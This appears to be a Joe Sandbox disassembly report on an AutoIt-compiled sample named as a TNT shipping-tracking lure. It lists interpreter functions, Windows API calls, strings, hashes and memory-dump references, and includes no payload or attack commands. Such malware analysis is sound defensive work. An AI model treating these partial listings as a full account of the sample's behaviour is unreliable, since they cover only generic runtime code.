API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: 98f916a4126c50fb29163a0af9ad8e1d83b596c1f141e7a3f8ad5fb91d99487f
Instruction ID: bb1cf7d74cc4b61d92e1bc63e22637ca7efb6f4fe65e7de4767516354f1c9790
Opcode Fuzzy Hash: 98f916a4126c50fb29163a0af9ad8e1d83b596c1f141e7a3f8ad5fb91d99487f
Instruction Fuzzy Hash: 19E0D872410501A78220AB38EC4D4FD7BACDE06335F10076AF935C21D0EF745D019595

Function 00AADF00 Relevance: 3.5, APIs: 2, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea918a1d9d01465dc75ca4ea9074a2629c28f2f13936436f5ce9f3442ef7f13a
Instruction ID: 1d7c2cf71b375095a58d85d0d4c717c710dbdccf163030e248adfd3970125c59
Opcode Fuzzy Hash: ea918a1d9d01465dc75ca4ea9074a2629c28f2f13936436f5ce9f3442ef7f13a
Instruction Fuzzy Hash: 60229AB1A00216DFDF24DF64C494ABEB7B0FF0A310F148569E846AB381E774A985CB91

Function 00AAE6A0 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 00AE3E62

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: e72c978844faff848667138ac067f2b1365824007aa7d38be9dfee20a4ddeaa6
Instruction ID: 376045b2e397a1cf3d103ec68f9cfb9bce63e658f418302fa01e2fe3f15e4984
Opcode Fuzzy Hash: e72c978844faff848667138ac067f2b1365824007aa7d38be9dfee20a4ddeaa6
Instruction Fuzzy Hash: DEA28C75A00205CFCB24CF98C494AAEB7F2FF5A314F248569E906AB391D775ED42CB90

Function 00AB09D0 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00AB0A5B
timeGetTime.WINMM ref: 00AB0D16
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00AB0E53
Sleep.KERNEL32(0000000A), ref: 00AB0E61
LockWindowUpdate.USER32(00000000,?,?), ref: 00AB0EFA
DestroyWindow.USER32 ref: 00AB0F06
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00AB0F20
Sleep.KERNEL32(0000000A,?,?), ref: 00AE4E83
TranslateMessage.USER32(?), ref: 00AE5C60
DispatchMessageW.USER32(?), ref: 00AE5C6E
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00AE5C82

Strings

@GUI_WINHANDLE, xrefs: 00AE4F8F
@GUI_CTRLID, xrefs: 00AE4F3A
@GUI_CTRLHANDLE, xrefs: 00AE4FE4
@TRAY_ID, xrefs: 00AE578F
@COM_EVENTOBJ, xrefs: 00AE54F0

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
API String ID: 4212290369-3242690629
Opcode ID: fdc6186a51b87d1d459d10ade50f6e63b4de873219833e91aabfadccd19b0a88
Instruction ID: 219f77613e73cb82413ef1d0a0f38fbe62f6c4661e5f384592343768f0f11787
Opcode Fuzzy Hash: fdc6186a51b87d1d459d10ade50f6e63b4de873219833e91aabfadccd19b0a88
Instruction Fuzzy Hash: 1EB2BF70A08781DFD724DF25C994FABBBE5BF85308F14491DE589972A2CB74E844CB82

Function 00B09155 Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B08F5F: __time64.LIBCMT ref: 00B08F69

Part of subcall function 00AA4EE5: _fseek.LIBCMT ref: 00AA4EFD

__wsplitpath.LIBCMT ref: 00B09234

Part of subcall function 00AC40FB: __wsplitpath_helper.LIBCMT ref: 00AC413B

_wcscpy.LIBCMT ref: 00B09247
_wcscat.LIBCMT ref: 00B0925A
__wsplitpath.LIBCMT ref: 00B0927F
_wcscat.LIBCMT ref: 00B09295
_wcscat.LIBCMT ref: 00B092A8

Part of subcall function 00B08FA5: _memmove.LIBCMT ref: 00B08FDE
Part of subcall function 00B08FA5: _memmove.LIBCMT ref: 00B08FED

_wcscmp.LIBCMT ref: 00B091EF

Part of subcall function 00B09734: _wcscmp.LIBCMT ref: 00B09824
Part of subcall function 00B09734: _wcscmp.LIBCMT ref: 00B09837

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00B09452
_wcsncpy.LIBCMT ref: 00B094C5
DeleteFileW.KERNEL32(?,?), ref: 00B094FB
CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00B09511
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B09522
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B09534

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: efb4a0c82fbf0a4157dd15045942322a6ea5e33681c8484b4fa7c4f1e80dd514
Instruction ID: 62d948d7b1fe127a2128657c4f2bc927eb8a085ee38b26beff9cddc1d0e3b6e5
Opcode Fuzzy Hash: efb4a0c82fbf0a4157dd15045942322a6ea5e33681c8484b4fa7c4f1e80dd514
Instruction Fuzzy Hash: 9EC14FB1D00219AADF21DF95CD85EDEBBBDEF95300F0040AAF609E7191EB709A448F65

Function 00AA3015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00AA3074
RegisterClassExW.USER32(00000030), ref: 00AA309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00AA30AF
InitCommonControlsEx.COMCTL32(?), ref: 00AA30CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00AA30DC
LoadIconW.USER32(000000A9), ref: 00AA30F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00AA3101

Strings

AutoIt v3 GUI, xrefs: 00AA3090
TaskbarCreated, xrefs: 00AA30A4
+, xrefs: 00AA305D
0, xrefs: 00AA3056

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: f1a8ce709c65a8a86fcc1bef93eae75f4bbf6d6d9653128466045503f3dbcb37
Instruction ID: a926fadcf8571ae3ded0dc568a8b9a517e19d62e5cc764aff403e9a76ec7c255
Opcode Fuzzy Hash: f1a8ce709c65a8a86fcc1bef93eae75f4bbf6d6d9653128466045503f3dbcb37
Instruction Fuzzy Hash: 233138B184134AAFDB20CFA4E889ADDBBF0FB09310F14456EE580A72A1DBB90591CF51

Function 00AA3041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00AA3074
RegisterClassExW.USER32(00000030), ref: 00AA309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00AA30AF
InitCommonControlsEx.COMCTL32(?), ref: 00AA30CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00AA30DC
LoadIconW.USER32(000000A9), ref: 00AA30F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00AA3101

Strings

AutoIt v3 GUI, xrefs: 00AA3090
TaskbarCreated, xrefs: 00AA30A4
+, xrefs: 00AA305D
0, xrefs: 00AA3056

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 3ad03de680048ab6dac325516cc09af3a2682f38d88b69d8724357aa62c3575c
Instruction ID: e2136aef6134c1cdef96e50491261e1fcd9a49648002cd1c82b608da5ecb0ef9
Opcode Fuzzy Hash: 3ad03de680048ab6dac325516cc09af3a2682f38d88b69d8724357aa62c3575c
Instruction Fuzzy Hash: D221C7B1D01219AFDB20DFA4ED49BEEBBF4FB08700F00412AF550A72A0DBB545558F95

Function 00AA708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00AA4706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00B652F8,?,00AA37AE,?), ref: 00AA4724

Part of subcall function 00AC050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00AA7165), ref: 00AC052D

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00AA71A8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00ADE8C8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00ADE909
RegCloseKey.ADVAPI32(?), ref: 00ADE947
_wcscat.LIBCMT ref: 00ADE9A0

Strings

\Include\, xrefs: 00AA7165
Software\AutoIt v3\AutoIt, xrefs: 00AA719E
\, xrefs: 00ADE9C3
Include, xrefs: 00ADE8BF, 00ADE900

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: 7750570fc1f613de46ba384c56606c2fcd716722f0bc835049d132f1f2792f98
Instruction ID: 6eb777d2a709eeb8cf659132bd1e7ef9f8450fb149d27e825f22e5e3995b8bf9
Opcode Fuzzy Hash: 7750570fc1f613de46ba384c56606c2fcd716722f0bc835049d132f1f2792f98
Instruction Fuzzy Hash: 96716B725093019EC304EF65ED619AFBBF8FF89350B40092EF445872E0EBB59948CB92

Function 00AA3A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00AA3A50
LoadCursorW.USER32(00000000,00007F00), ref: 00AA3A5F
LoadIconW.USER32(00000063), ref: 00AA3A76
LoadIconW.USER32(000000A4), ref: 00AA3A88
LoadIconW.USER32(000000A2), ref: 00AA3A9A
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00AA3AC0
RegisterClassExW.USER32(?), ref: 00AA3B16

Part of subcall function 00AA3041: GetSysColorBrush.USER32(0000000F), ref: 00AA3074
Part of subcall function 00AA3041: RegisterClassExW.USER32(00000030), ref: 00AA309E
Part of subcall function 00AA3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00AA30AF
Part of subcall function 00AA3041: InitCommonControlsEx.COMCTL32(?), ref: 00AA30CC
Part of subcall function 00AA3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00AA30DC
Part of subcall function 00AA3041: LoadIconW.USER32(000000A9), ref: 00AA30F2
Part of subcall function 00AA3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00AA3101

Strings

0, xrefs: 00AA3AF4
#, xrefs: 00AA3AFB
AutoIt v3, xrefs: 00AA3B05

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: ffc9a28a9a13b4835d92f43503f5528eb27830ecb6a83604ab494a48f028b32a
Instruction ID: 51c15e6c8c4151b5e9cfb46cab241d226d6a5e261fb3afbdf69fcac75709fb64
Opcode Fuzzy Hash: ffc9a28a9a13b4835d92f43503f5528eb27830ecb6a83604ab494a48f028b32a
Instruction Fuzzy Hash: 44210671D00309AFEB20DFA4ED59BAD7BB4EB08711F10012AF504A72E1DBB95A608F94

Function 00AA3633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 00AA36D2
KillTimer.USER32(?,00000001), ref: 00AA36FC
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00AA371F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00AA372A
CreatePopupMenu.USER32 ref: 00AA373E
PostQuitMessage.USER32(00000000), ref: 00AA374D

Strings

TaskbarCreated, xrefs: 00AA3725

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: d882296679bdb578b94c43e3ea4d1e901ce17ef9d814c6a85a64041d25fead6c
Instruction ID: 1d7403435502b268a123181260e769d94f4ba8adb55ddbaf6f6308a903936bd5
Opcode Fuzzy Hash: d882296679bdb578b94c43e3ea4d1e901ce17ef9d814c6a85a64041d25fead6c
Instruction Fuzzy Hash: 8B41E7B3200506BBDF349F68DD09BBA37A9EB46300F140139F602972F2DFA59E659661

Function 00AA3766 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

CMDLINE, xrefs: 00AA3822
/AutoIt3ExecuteScript, xrefs: 00AA38BC
>>>AUTOIT NO CMDEXECUTE<<<, xrefs: 00AA37AE
/AutoIt3OutputDebug, xrefs: 00AA3892
CMDLINERAW, xrefs: 00AA37FB
/AutoIt3ExecuteLine, xrefs: 00AA38A7
/ErrorStdOut, xrefs: 00AA387D

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
API String ID: 1825951767-3513169116
Opcode ID: 47f8607f9949b6566f0ac08d15efd5dab03009d474af01b9df59a95e550f3e18
Instruction ID: c3f78ca56b2712cd4e109d47d8c189d8a697277521df9d9b602d7c9cf0354be4
Opcode Fuzzy Hash: 47f8607f9949b6566f0ac08d15efd5dab03009d474af01b9df59a95e550f3e18
Instruction Fuzzy Hash: B6A12B7291021D9ACF15EBA4DD91EEEBBB9BF16300F44052AF416B71D1DF789A08CB60

Function 03960920 Relevance: 10.7, APIs: 7, Instructions: 151
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 03960965

Memory Dump Source

Source File: 00000000.00000002.2195463668.0000000003960000.00000040.00001000.00020000.00000000.sdmp, Offset: 03960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3960000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
Instruction ID: 7d69b2be619acf001004cbda294efd15db69a16cdc4bedfbe24cfd5b64ac1051
Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
Instruction Fuzzy Hash: 58510875A55208FBEF20DFA4CC89FDE7778AF48740F108954F64AEA2C0DA749A44CB60

Function 00AA39D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00AA3A03
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00AA3A24
ShowWindow.USER32(00000000,?,?), ref: 00AA3A38
ShowWindow.USER32(00000000,?,?), ref: 00AA3A41

Strings

edit, xrefs: 00AA3A1E
AutoIt v3, xrefs: 00AA39FB, 00AA3A00, 00AA3A01

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 1f2b8746be5ddaf2a3d1ab0219c2f24d4ed583febbaa894ab2a7c6c45ed2e986
Instruction ID: 331169d6547fc02fb9f8af3cf5a834c0a7f06c5d60d0e1f4a348e7d0c2fb54e5
Opcode Fuzzy Hash: 1f2b8746be5ddaf2a3d1ab0219c2f24d4ed583febbaa894ab2a7c6c45ed2e986
Instruction Fuzzy Hash: 40F0DA715416907EEA315B276C59E7B2E7DD7C6F50F00413AF904A31B0CAA91861DAB0

Function 00AA407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00ADD3D7

Part of subcall function 00AA7BCC: _memmove.LIBCMT ref: 00AA7C06

_memset.LIBCMT ref: 00AA40FC
_wcscpy.LIBCMT ref: 00AA4150
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00AA4160

Strings

Line: , xrefs: 00ADD400

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
String ID: Line:
API String ID: 3942752672-1585850449
Opcode ID: 077cc32188280ebaa82d0165f8f5a6935f9608d32a236d87e0d3094bb246845b
Instruction ID: c1733ece3384ccb6168db15ccbbdf02875252a4d16a14d50a0fb9cf7861fba9b
Opcode Fuzzy Hash: 077cc32188280ebaa82d0165f8f5a6935f9608d32a236d87e0d3094bb246845b
Instruction Fuzzy Hash: 2731AD71008305AAD331EB60ED46FDB77E8AB95310F10461AF686931E1EFB89658CB92

Function 00AC541D Relevance: 7.7, APIs: 5, Instructions: 163
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 00AC547B
_memcpy_s.LIBCMT ref: 00AC54ED
__read_nolock.LIBCMT ref: 00AC554B
__filbuf.LIBCMT ref: 00AC556E
_memset.LIBCMT ref: 00AC55B2

Part of subcall function 00AC8B28: __getptd_noexit.LIBCMT ref: 00AC8B28

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
Instruction ID: ba36b9ff97ce80aa437cf12c429e6cf3a8e43592979ea8d97a8dbc52d216d1a8
Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
Instruction Fuzzy Hash: 2F517270E00A099BDB288F79D940F6E77B7AF45321F25862DF825962D1DB70ADD08B40

Function 00AA686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00AA4DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00B652F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00AA4E0F

_free.LIBCMT ref: 00ADE263
_free.LIBCMT ref: 00ADE2AA

Part of subcall function 00AA6A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00AA6BAD

Strings

Bad directive syntax error, xrefs: 00ADE292
